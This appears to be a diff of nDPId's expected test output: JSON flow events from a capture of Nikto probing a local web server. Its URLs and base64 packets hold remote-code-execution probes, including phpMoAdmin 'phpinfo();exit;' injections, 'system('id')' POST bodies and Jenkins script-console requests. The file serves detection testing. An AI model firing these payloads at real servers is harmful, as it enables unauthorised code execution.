(Evasions:None) (Test:006999)"}}
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
-00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01127{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00883{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="}
-00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
+01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":775,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"ts_msec":1576420277977,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
